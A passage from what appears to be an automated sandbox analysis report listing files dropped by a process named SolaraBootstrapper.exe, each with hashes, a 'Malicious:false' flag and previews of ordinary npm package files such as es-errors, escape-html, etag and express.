                                                  SSDEEP:3:n+F7LfMfFPfM4MewaBidLR5Mevn:68fFP044gidL0w
                                                  MD5:BE140BFA1F1D45FCF55EAC78A2555F80
                                                  SHA1:17B6EE5677EECE7445F509BB9A405025029C4396
                                                  SHA-256:7A47E9178209435C05B910D1AAC6FC939721C2CF45A878759C9A855B0B67551F
                                                  SHA-512:B8AE4A5F323EFD8F0A8D5213F855D8E4BE2774386ED45E4428E8E45D82371B769BA94F50D620E5736742FCCDBABE768CDC3C15A0C68E835B858A273DDAE67459
                                                  Malicious:false
                                                  Preview:declare const SyntaxError: SyntaxErrorConstructor;..export = SyntaxError;.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):79
                                                  Entropy (8bit):4.677888697874895
                                                  Encrypted:false
                                                  SSDEEP:3:agW8PPf6VCTRE73zBbdl5Mevn:QQCVIRELzBaw
                                                  MD5:0AFBD3A8277DF33593B212951D15E83D
                                                  SHA1:35BC36A396E20F15E42C817205CA259820A7998C
                                                  SHA-256:56574ECD3EB54C06EFD319080CC8923992791E430C914520B85E92C2F5E373F5
                                                  SHA-512:68AC55A4F1204EB9A57024AED80FB02537CF36F7FAF601084EA98D026063FE0127E2D331A10F75E2F6EDE6CD8FA250888DCAA2C19A642499CC095EAAF5B77869
                                                  Malicious:false
                                                  Preview:'use strict';../** @type {import('./syntax')} */.module.exports = SyntaxError;.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):356
                                                  Entropy (8bit):4.671574563068067
                                                  Encrypted:false
                                                  SSDEEP:6:QcALIzhHIq1z7jEV1J7Ro0Jxj+AJ2RY+AJyTyta3+AJ8H+AJ4WuTS:jSIzhoq1zEFxjJVJevJ8fJAW
                                                  MD5:DCEEEC0A60F808B4E644B3897BED5181
                                                  SHA1:50C0BDA7B8469012BF6D9F951F9AEF57912EEE06
                                                  SHA-256:14E2B88A10618AC3947289F93011DCFC5A2C27FCB585F453F99DE8EE739185F8
                                                  SHA-512:4A89C6AE3840DE13989885CEB225547E1B849FDB87499728BD16E990879D180FE4B8D6125B5C621534509B03188E31460B4871C51AD5A762154139D212248248
                                                  Malicious:false
                                                  Preview:'use strict';..var test = require('tape');..var E = require('../');.var R = require('../range');.var Ref = require('../ref');.var S = require('../syntax');.var T = require('../type');..test('errors', function (t) {..t.equal(E, Error);..t.equal(R, RangeError);..t.equal(Ref, ReferenceError);..t.equal(S, SyntaxError);..t.equal(T, TypeError);...t.end();.});.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):3170
                                                  Entropy (8bit):4.728899059215554
                                                  Encrypted:false
                                                  SSDEEP:48:cj12nTY8LdkWoltx4I8OjMGqoqZjuJGJkeGzJfYMT2s+TmC:I1WWtx4ITjDqoql+Ok3AMqs+TmC
                                                  MD5:A028DEACF8E8CAD14B8936A47BC68F0D
                                                  SHA1:26B9D25453F283307EFB19D0E005CF704E3368A6
                                                  SHA-256:539CACFFE5895FCF9A9EB59E3A6A9FADBB41BA3E05339D97E3B55DA34D2C85A4
                                                  SHA-512:D239A3DA47AA3F920BF5B1B0A77A606148527CB8F97DB66C07E5BBE48DB67209DA6F702AFEDEBA77DC2774E852EADF9D00BB873CA46ABD5734A95E81DD973B81
                                                  Malicious:false
                                                  Preview:{.."compilerOptions": {.../* Visit https://aka.ms/tsconfig.json to read more about this file */..../* Projects */..../* Language and Environment */..."target": "es5",................./* Set the JavaScript language version for emitted JavaScript and include compatible library declarations. */...// "lib": [],..................../* Specify a set of bundled library declaration files that describe the target runtime environment. */...// "noLib": true,................../* Disable including any library files, including the default lib.d.ts. */..."useDefineForClassFields": true,.......... /* Emit ECMAScript-standard-compliant class fields. */...// "moduleDetection": "auto",............/* Control what method is used to detect module-format JS files. */..../* Modules */..."module": "commonjs",................/* Specify what module code is generated. */...// "rootDir": "./",................./* Specify the root folder within your source files. */...// "moduleResolution": "node",........... /* Spec
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):67
                                                  Entropy (8bit):3.9966704773261528
                                                  Encrypted:false
                                                  SSDEEP:3:n+Fa26DMvJioqUn:6a2UuJiu
                                                  MD5:D352323A3FCAF24866E20A8D3190B72B
                                                  SHA1:3DC9C2535799EF547F5745F62D71BC9B49E678E1
                                                  SHA-256:BF83D189C911C5D6F970C3C6A0DDF5637EFE3DEAFAAD89C31EF4418A2F90487A
                                                  SHA-512:DE779EFF08FCDB3353CFCCB3B9DDF81B905D66BD49B5B1816B31CACEE59811A1786143496AD5690312C79D089FB681691CF53B19F68CC70F5E35B27EA829F981
                                                  Malicious:false
                                                  Preview:declare const TypeError: TypeErrorConstructor..export = TypeError;.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):75
                                                  Entropy (8bit):4.539908150490569
                                                  Encrypted:false
                                                  SSDEEP:3:agW8PPf6VCTPYK3zBboVAUn:QQCVu9zBcVt
                                                  MD5:9F2F1F6BB3DC762BC12E377E00E9F775
                                                  SHA1:67ECCB172529A5D24D804C8316DE4A889BFDD985
                                                  SHA-256:C71B2F41C15EDB3824F50DD24DF900495C8CAABA5B6E9A80851B82BB2309827B
                                                  SHA-512:6F5B1C38E3CF8913FB755C184F44323457A541A99DA23EE416939AC5A62B4951A626C1DE8F04E6F7A2127B576627E8A3DF255A5432B8535FC37E856DE169BE9A
                                                  Malicious:false
                                                  Preview:'use strict';../** @type {import('./type')} */.module.exports = TypeError;.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):65
                                                  Entropy (8bit):4.073890062569708
                                                  Encrypted:false
                                                  SSDEEP:3:n+FCB+FEMewaBisJvn:6CB+FE4gie
                                                  MD5:F98771BA2A6F4897F01BC0C07A4C4ECD
                                                  SHA1:B3A1400203D7B8FB2B67BCDB07D34C81EA6025C3
                                                  SHA-256:CCBB8676063C7D4446B57E51B13D2F3D24A48AD419F9495B5BB21BD86F8C9374
                                                  SHA-512:C3B273A0A96FC8AFE0CAA196EB064DB3254DCBFA45FD6BE2B90E9E2C645EBAB9C3E9ACD65C540DA7D13868DD70EAED9A20937F7B411151E7676A8CC541888F5C
                                                  Malicious:false
                                                  Preview:declare const URIError: URIErrorConstructor;..export = URIError;.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):73
                                                  Entropy (8bit):4.637766682905392
                                                  Encrypted:false
                                                  SSDEEP:3:agW8PPf6VC8P03zBbssqvn:QQCV8zBAsU
                                                  MD5:73E1A7405C670740980CAD2ABDA5CA15
                                                  SHA1:0319C74BFD36D4E73ADD442A0A0CB9C6DB78E822
                                                  SHA-256:E1E5591BDE037A2FFEDA822FA03FAC22FF7C93C7B269ED9ADF1CBEA0E21614B0
                                                  SHA-512:3E476D6E67E2E1324527F6C537B52C58654C7DB487746E39BE82230C4E0C7E79F3CC180767D338EA3A4DCED9FCC7A25BD7F082D1CF2C19C2AE8440725DA1BA6A
                                                  Malicious:false
                                                  Preview:'use strict';../** @type {import('./uri')} */.module.exports = URIError;.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1157
                                                  Entropy (8bit):5.1874286589078835
                                                  Encrypted:false
                                                  SSDEEP:24:ylEiJH/ZHHuyPP3GtIHw1Gg9MPH+sUW8Ok4odZo3U/qldFD:TiJfxfPvGt7ICMPH+sfINi3OMFD
                                                  MD5:F8746101546EEB9E4F6DE64BB8BDF595
                                                  SHA1:ADF7A452C47FF87C48DEFF37D703F1668F1276CA
                                                  SHA-256:255AA557A1F55224CE522F311629C0BF20854740A67955CEFD798FBD1D3D1DED
                                                  SHA-512:DD1E90B0B9C851F3CCD5FC94F69723C7877F892DCD09C3578CE7106B8CDA4768854A948623ECB9D256153133FE244F4CF61A413BEB0516BEFB888D3CD223D77B
                                                  Malicious:false
                                                  Preview:(The MIT License)..Copyright (c) 2012-2013 TJ Holowaychuk.Copyright (c) 2015 Andreas Lubbe.Copyright (c) 2015 Tiancheng "Timothy" Gu..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the.'Software'), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY.CLAIM, DAMAGES OR OTHER LIABILITY
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text
                                                  Category:dropped
                                                  Size (bytes):707
                                                  Entropy (8bit):5.087211284917226
                                                  Encrypted:false
                                                  SSDEEP:12:IFNTlGt2cCHm3bKAYTBCKva+laAhxK23mvDMW8NqgYq45wLKLd1dDFONnHADn:IFvGt2zHsbKAYTsz+lO2gQNqga9J1a2
                                                  MD5:79C73D9EC4CA382FA642702F356B4046
                                                  SHA1:35923A97D4A2F8B712D85A18AFA3DAA7E1B7A53E
                                                  SHA-256:86530565532EDE3EFB547E89694BD94CD384C6A4A6CE071AFECB3381DFB2EF22
                                                  SHA-512:A099C305B9121023FEC178460D22D19AAD8DDF7FB20A3F08461ACAF346EAA0D4073BC052C38EB8FD9CA01552F09D1B58F3A0A19278F697FE5F505473E2964CCD
                                                  Malicious:false
                                                  Preview:.# escape-html.. Escape string for use in HTML..## Example..```js.var escape = require('escape-html');.var html = escape('foo & bar');.// -> foo &amp; bar.```..## Benchmark..```.$ npm run-script bench..> escape-html@1.0.3 bench nodejs-escape-html.> node benchmark/index.js... http_parser@1.0. node@0.10.33. v8@3.14.5.9. ares@1.9.0-DEV. uv@0.10.29. zlib@1.2.3. modules@11. openssl@1.0.1j.. 1 test completed.. 2 tests completed.. 3 tests completed... no special characters x 19,435,271 ops/sec .0.85% (187 runs sampled). single special character x 6,132,421 ops/sec .0.67% (194 runs sampled). many special characters x 3,175,826 ops/sec .0.65% (193 runs sampled).```..## License.. MIT
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1362
                                                  Entropy (8bit):4.749244864705344
                                                  Encrypted:false
                                                  SSDEEP:24:W3+pR+TJ+Yg9H8KJAtB9fKEb6aWWkvpUXMSDYbwfgtXXvuXz3XBjIiXyHikJ7yP+:VpkAL9HWTC+WWkvpUe/
                                                  MD5:0C95E46D0F08BD96B93CFBEA66888AFC
                                                  SHA1:DFBB19C79EB0CA7FF2625FB1975A35CF47BE378A
                                                  SHA-256:42A7F91883D0C5CE9292DDA4E017E1F8664D34B09276D89FB6F3859C29D1CA9B
                                                  SHA-512:FBEB545274E55F0DFACE8407A563878083E8D2EDC16320A31802E7B4C1DBF6D37F20B772C7436CB1810ADB524EF86B3378B6B76A35E0967B6CAE58340C58D4AD
                                                  Malicious:false
                                                  Preview:/*!. * escape-html. * Copyright(c) 2012-2013 TJ Holowaychuk. * Copyright(c) 2015 Andreas Lubbe. * Copyright(c) 2015 Tiancheng "Timothy" Gu. * MIT Licensed. */..'use strict';../**. * Module variables.. * @private. */..var matchHtmlRegExp = /["'&<>]/;../**. * Module exports.. * @public. */..module.exports = escapeHtml;../**. * Escape special characters in the given string of html.. *. * @param {string} string The string to escape for inserting into HTML. * @return {string}. * @public. */..function escapeHtml(string) {. var str = '' + string;. var match = matchHtmlRegExp.exec(str);.. if (!match) {. return str;. }.. var escape;. var html = '';. var index = 0;. var lastIndex = 0;.. for (index = match.index; index < str.length; index++) {. switch (str.charCodeAt(index)) {. case 34: // ". escape = '&quot;';. break;. case 38: // &. escape = '&amp;';. break;. case 39: // '. escape = '&#39;';. break;. case 60: // <.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):434
                                                  Entropy (8bit):4.644067652549469
                                                  Encrypted:false
                                                  SSDEEP:12:i78Fw18e4Id6hOi+rCW675JjJkttDGCIR5+laAkR:i78Fw1IId6hNcCW6XjzT+l8
                                                  MD5:E9C758769FEC9883D5CE3D30B8EE1047
                                                  SHA1:F9D3FD64A0196E77965489CE9B81FE4CE3A9ECB1
                                                  SHA-256:BD320A3E9D23249F5F7D3CE72F2FA426E28A6B2704BD2B281D0C92806A1F5223
                                                  SHA-512:E54BBB849368A53C620B65D0E4A847869DEA8FBB767F3559315D9E031C11F23DF4AC9D746B7883CAF3F693C748E1B9C90F8789519891ED179399341CD49DCAE2
                                                  Malicious:false
                                                  Preview:{. "name": "escape-html",. "description": "Escape string for use in HTML",. "version": "1.0.3",. "license": "MIT",. "keywords": [. "escape",. "html",. "utility". ],. "repository": "component/escape-html",. "devDependencies": {. "benchmark": "1.0.0",. "beautify-benchmark": "0.2.4". },. "files": [. "LICENSE",. "Readme.md",. "index.js". ],. "scripts": {. "bench": "node benchmark/index.js". }.}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1732
                                                  Entropy (8bit):4.85905820338544
                                                  Encrypted:false
                                                  SSDEEP:48:GO8CfPirwW1ml6lv7lpbPCKRtC1fCfBfP:6UPIw4mC9
                                                  MD5:959D386C253288FD5DD2DC4765EFA273
                                                  SHA1:9254BD99614FABA324D793FB9AC0A6DF84E585CF
                                                  SHA-256:A6311C59A3EA30AF617C8526EB2AA086B835260BF05490C81FA8E696E24CE7CD
                                                  SHA-512:9FC3523FF57C99FBD2772819EA2B80A911E4603E94CEDB215E0144C572C798AD4CB77E94D592080020C4F8074D08BF82098E1E84528D7C3719CA3B0EE77ED5D0
                                                  Malicious:false
                                                  Preview:1.8.1 / 2017-09-12.==================.. * perf: replace regular expression with substring..1.8.0 / 2017-02-18.==================.. * Use SHA1 instead of MD5 for ETag hashing. - Improves performance for larger entities. - Works with FIPS 140-2 OpenSSL configuration..1.7.0 / 2015-06-08.==================.. * Always include entity length in ETags for hash length extensions. * Generate non-Stats ETags using MD5 only (no longer CRC32). * Improve stat performance by removing hashing. * Remove base64 padding in ETags to shorten. * Use MD5 instead of MD4 in weak ETags over 1KB..1.6.0 / 2015-05-10.==================.. * Improve support for JXcore. * Remove requirement of `atime` in the stats object. * Support "fake" stats objects in environments without `fs`..1.5.1 / 2014-11-19.==================.. * deps: crc@3.2.1. - Minor fixes..1.5.0 / 2014-10-14.==================.. * Improve string performance. * Slightly improve speed for weak ETags over 1KB..1.4.0 / 2014-09-21.====
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1094
                                                  Entropy (8bit):5.1284116326456815
                                                  Encrypted:false
                                                  SSDEEP:24:PiJH/ZHHuyPP3GtIHw1Gg9MPH+sUW8Ok4odZo3U/qldFD:PiJfxfPvGt7ICMPH+sfINi3OMFD
                                                  MD5:6E8686B7B13DD7AC8733645A81842C4A
                                                  SHA1:B058A139CB239C658C8F1F841A475A50818B5F73
                                                  SHA-256:A7996721249A136FBCFC1C201BCB5F414F38A701D4A24F28ABE65E16CFCCE813
                                                  SHA-512:1CACD9111B9EB27A0FD326DD19D61BDF767E443EE1DD09D983AF81199ECDA0D7CF047FBD18B900C7D773972B1278D5D3C19FA753591333C04C27DDAC71AF6422
                                                  Malicious:false
                                                  Preview:(The MIT License)..Copyright (c) 2014-2016 Douglas Christopher Wilson..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the.'Software'), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY.CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,.TORT OR OTHERWISE, ARISING
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:exported SGML document, Unicode text, UTF-8 text
                                                  Category:dropped
                                                  Size (bytes):4198
                                                  Entropy (8bit):5.2388246497103825
                                                  Encrypted:false
                                                  SSDEEP:96:IXCcnI159F3hrp6Kx+1+G+GG+HE++PU+j+N0WBNN:IycKFxr3U4b4+taph
                                                  MD5:89C2C0F9F52F551591BFC484E9E4A5BB
                                                  SHA1:1C8D6561875E0E3A276546B16F0596C9A231E269
                                                  SHA-256:8A982DB264A205206E5F2C18B0DC2FBB3A46762E997E89FCEBF439E390D0CF65
                                                  SHA-512:CA487012341BE1D26885D68A7E3A5157AEDD4870122A016BC71415505BAD1546FFA34C305D3A85F1698F55B3BFF4F36872027911E4C84DE95F5120598840B889
                                                  Malicious:false
                                                  Preview:# etag..[![NPM Version][npm-image]][npm-url].[![NPM Downloads][downloads-image]][downloads-url].[![Node.js Version][node-version-image]][node-version-url].[![Build Status][travis-image]][travis-url].[![Test Coverage][coveralls-image]][coveralls-url]..Create simple HTTP ETags..This module generates HTTP ETags (as defined in RFC 7232) for use in.HTTP responses...## Installation..This is a [Node.js](https://nodejs.org/en/) module available through the.[npm registry](https://www.npmjs.com/). Installation is done using the.[`npm install` command](https://docs.npmjs.com/getting-started/installing-npm-packages-locally):..```sh.$ npm install etag.```..## API.. eslint-disable no-unused-vars -->..```js.var etag = require('etag').```..### etag(entity, [options])..Generate a strong ETag for the given entity. This should be the complete.body of the entity. Strings, `Buffer`s, and `fs.Stats` are accepted. By.default, a strong ETag is generated except for `fs.Stats`, which will.generate a weak ET
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):2479
                                                  Entropy (8bit):4.87277685592207
                                                  Encrypted:false
                                                  SSDEEP:48:RBGj9Hi6KMyKW0Ng1yTCACja5vSwUDboyioGbJPmud7gyX6:2ZWwg1SCP26BaRw
                                                  MD5:8EACA1927E67861A7682B7B2C0906EF1
                                                  SHA1:6A87B3C916A9B9E4B202949BE356871E1682AF9E
                                                  SHA-256:A95A23B9A60726A4522B768C88AD73A7EA2C539D220068227F5510A8EE2008AE
                                                  SHA-512:F7FA830CA33BCE08C37B8789EADDB5BC6853C774EE86C96D801DEDBEC5955306B1A4BCC3F6EAE33AD4EA73278567ADA9038EAB8AB1E95B256F2D060F7A06388E
                                                  Malicious:false
                                                  Preview:/*!. * etag. * Copyright(c) 2014-2016 Douglas Christopher Wilson. * MIT Licensed. */..'use strict'../**. * Module exports.. * @public. */..module.exports = etag../**. * Module dependencies.. * @private. */..var crypto = require('crypto').var Stats = require('fs').Stats../**. * Module variables.. * @private. */..var toString = Object.prototype.toString../**. * Generate an entity tag.. *. * @param {Buffer|string} entity. * @return {string}. * @private. */..function entitytag (entity) {. if (entity.length === 0) {. // fast-path empty. return '"0-2jmj7l5rSw0yVb/vlWAYkK/YBwk"'. }.. // compute hash of entity. var hash = crypto. .createHash('sha1'). .update(entity, 'utf8'). .digest('base64'). .substring(0, 27).. // compute length of entity. var len = typeof entity === 'string'. ? Buffer.byteLength(entity, 'utf8'). : entity.length.. return '"' + len.toString(16) + '-' + hash + '"'.}../**. * Create a simple ETag.. *. * @param {string|Buffer|Stats} entity. * @param
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):1306
                                                  Entropy (8bit):4.880705927600969
                                                  Encrypted:false
                                                  SSDEEP:24:SF7vd11dxVkyOrhBFjFCfP6ifPVQeZWnWjxCcB6T+l6oOUZqy4y8e1w:27v5bVkdhz5CfSifPVQeQWjIe0+woOUu
                                                  MD5:FEC91CC11E50EE734C65C2D703DB3884
                                                  SHA1:E2DEBD5C6530254ABE164BBD44F1E48B7C7C0018
                                                  SHA-256:836B9A5DD1C6AF638F4602E83E2568277F9AB1F457DB0B95D949C2A4DDB0462A
                                                  SHA-512:7A1D205F6B06142313DF3A2F1D149D0F1801269D06D17E12B3A81398A62156B071D646DAB332497C1D0D9A873FB58A7FE37EE6B4B9D53C8A10EE6F2AB9434010
                                                  Malicious:false
                                                  Preview:{. "name": "etag",. "description": "Create simple HTTP ETags",. "version": "1.8.1",. "contributors": [. "Douglas Christopher Wilson <doug@somethingdoug.com>",. "David Bj.rklund <david.bjorklund@gmail.com>". ],. "license": "MIT",. "keywords": [. "etag",. "http",. "res". ],. "repository": "jshttp/etag",. "devDependencies": {. "beautify-benchmark": "0.2.4",. "benchmark": "2.1.4",. "eslint": "3.19.0",. "eslint-config-standard": "10.2.1",. "eslint-plugin-import": "2.7.0",. "eslint-plugin-markdown": "1.0.0-beta.6",. "eslint-plugin-node": "5.1.1",. "eslint-plugin-promise": "3.5.0",. "eslint-plugin-standard": "3.0.1",. "istanbul": "0.4.5",. "mocha": "1.21.5",. "safe-buffer": "5.1.1",. "seedrandom": "2.4.3". },. "files": [. "LICENSE",. "HISTORY.md",. "README.md",. "index.js". ],. "engines": {. "node": ">= 0.6". },. "scripts": {. "bench": "node benchmark/index.js",. "lint": "eslint --plugin markdown --ext
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):113674
                                                  Entropy (8bit):4.971235838962134
                                                  Encrypted:false
                                                  SSDEEP:3072:8L6ttkL9LLAjclLsgNwsgX0RxCjC4MJHjH8oV:M6g9L/lLGXlDoV
                                                  MD5:04851369D7F7B8D9E7364D7CB6B7120C
                                                  SHA1:8856D3443BEF94A4AD5CBB8413DBFCC52E68F947
                                                  SHA-256:568B44175FF2D0E9535F710CCE4B5E9473B258D72357F45CF3C0653335264C02
                                                  SHA-512:950038C41BA1C1E5B67CBE7D75BC0D8B4248D0F4A5E0A7247EE1F5B37263062767B88CECE97B637767FACAB055A299B20FD64D68C60708DF96283C28E77A1E21
                                                  Malicious:false
                                                  Preview:4.19.2 / 2024-03-25.==========.. * Improved fix for open redirect allow list bypass..4.19.1 / 2024-03-20.==========.. * Allow passing non-strings to res.location with new encoding handling checks..4.19.0 / 2024-03-20.==========.. * Prevent open redirect allow list bypass due to encodeurl. * deps: cookie@0.6.0..4.18.3 / 2024-02-29.==========.. * Fix routing requests without method. * deps: body-parser@1.20.2. - Fix strict json error message on Node.js 19+. - deps: content-type@~1.0.5. - deps: raw-body@2.5.2. * deps: cookie@0.6.0. - Add `partitioned` option..4.18.2 / 2022-10-08.===================.. * Fix regression routing a large stack in a single route. * deps: body-parser@1.20.1. - deps: qs@6.11.0. - perf: remove unnecessary object clone. * deps: qs@6.11.0..4.18.1 / 2022-04-29.===================.. * Fix hanging on large stack of sync routes..4.18.0 / 2022-04-25.===================.. * Add "root" option to `res.download`. * Allow `options` without `file
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1249
                                                  Entropy (8bit):5.276725197908448
                                                  Encrypted:false
                                                  SSDEEP:24:lLNZiJH/ZHHuyPP3GtIHw1Gg9MPH+sUW8Ok4odZo3U/qldFD:fZiJfxfPvGt7ICMPH+sfINi3OMFD
                                                  MD5:5513C00A5C36CD361DA863DD9AA8875D
                                                  SHA1:056D455B1BD8DE050D92A35B6D20B6803725F29B
                                                  SHA-256:95A5762890E5C1C9808921CEF095661FC482C5E1F0BBA31446AC85595DF6237C
                                                  SHA-512:5E082F14AF74086BACFFA6BABB58741ECE4080E26A84C915169E85EC95ED607CFF3C302088AD7225A778EE34E24E5D837E22B02161CD30B3B6272BEC1FD22D56
                                                  Malicious:false
                                                  Preview:(The MIT License)..Copyright (c) 2009-2014 TJ Holowaychuk <tj@vision-media.ca>.Copyright (c) 2013-2014 Roman Shtylman <shtylman+expressjs@gmail.com>.Copyright (c) 2014-2015 Douglas Christopher Wilson <doug@somethingdoug.com>..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the.'Software'), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..IN NO EVEN
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):5421
                                                  Entropy (8bit):5.038177684298331
                                                  Encrypted:false
                                                  SSDEEP:96:0BOY1RXkqaIXbK7GbGCccbEU3hjmeoQ7oIzQpIrEjH1aR2Zx:OOfqaIXogic51mGUn
                                                  MD5:838DB28B501FAA40961AF644E01BAEF5
                                                  SHA1:BF340719FCADE6EEEA502F10C88280279CE1A2AC
                                                  SHA-256:265C5CE44C05F67C574B961D92BC71553580F88CB5B33AB7F2F6B1A19D4BF223
                                                  SHA-512:52C3DBCC9DDBF750A6C8B5BB1B88EA1E612CD4DD3EE47E10224DAED44A8C293B900227AE15250CB662A7967868399DD7CA1616370C21AFBDF3AEB360D4202493
                                                  Malicious:false
                                                  Preview:[![Express Logo](https://i.cloudup.com/zfY6lL7eFa-3000x3000.png)](http://expressjs.com/).. Fast, unopinionated, minimalist web framework for [Node.js](http://nodejs.org)... [![NPM Version][npm-version-image]][npm-url]. [![NPM Install Size][npm-install-size-image]][npm-install-size-url]. [![NPM Downloads][npm-downloads-image]][npm-downloads-url]..```js.const express = require('express').const app = express()..app.get('/', function (req, res) {. res.send('Hello World').})..app.listen(3000).```..## Installation..This is a [Node.js](https://nodejs.org/en/) module available through the.[npm registry](https://www.npmjs.com/)...Before installing, [download and install Node.js](https://nodejs.org/en/download/)..Node.js 0.10 or higher is required...If this is a brand new project, make sure to create a `package.json` first with.the [`npm init` command](https://docs.npmjs.com/creating-a-package-json-file)...Installation is done using the.[`npm install` command](https://docs.npmjs.com/getting
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):224
                                                  Entropy (8bit):5.139128378352818
                                                  Encrypted:false
                                                  SSDEEP:3:US94EcOmDDvB+Q91RmDDvm5wNi5pVmDDvHVJXWF3yFhWKZSsDp5cFDgqBBbJu4V9:Uju+BLPR+Mws57+xFvZSQp6tRBc49pH
                                                  MD5:866E37A4D9FB8799D5415D32AC413465
                                                  SHA1:3F41478FDAB31ACABAB8FA1D26126483A141FFB6
                                                  SHA-256:4D2F5AFC192178C5B0DC418D2DA5826D52A8B6998771B011AEDE7FDBA9118140
                                                  SHA-512:766D2E202DD5E520AC227E28E3C359CCA183605C52B4E4C95C69825C929356CEA772723A9AF491A3662D3C26F7209E89CC3A7AF76F75165C104492DC6728ACCC
                                                  Malicious:false
                                                  Preview:/*!. * express. * Copyright(c) 2009-2013 TJ Holowaychuk. * Copyright(c) 2013 Roman Shtylman. * Copyright(c) 2014-2015 Douglas Christopher Wilson. * MIT Licensed. */..'use strict';..module.exports = require('./lib/express');.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):14593
                                                  Entropy (8bit):4.840760542344076
                                                  Encrypted:false
                                                  SSDEEP:384:uJPZeLhzIZrg8ZanN45ysF9qug+2O/e8JH+nBGMiksrf:DL2Zrg8ZanN45ysF9qug+ZQ2
                                                  MD5:15CF9C2F48C7BA6583C59D28908E3E27
                                                  SHA1:19C7718F6A3D0F9DCD4CA692C19718EC29AAE092
                                                  SHA-256:5901B32F609BA349351BF7406DBDC0C4C57B77CE6F7215EA67CCCA5AC2A28E88
                                                  SHA-512:C063277A59B83DFFC085116769475EC5CCE1C47C167B9BD2246E8BDA04F0EBC2773B5F06E3B44FC5ED057E043F6D33E77741F34D15E22542134E3865574A29BE
                                                  Malicious:false
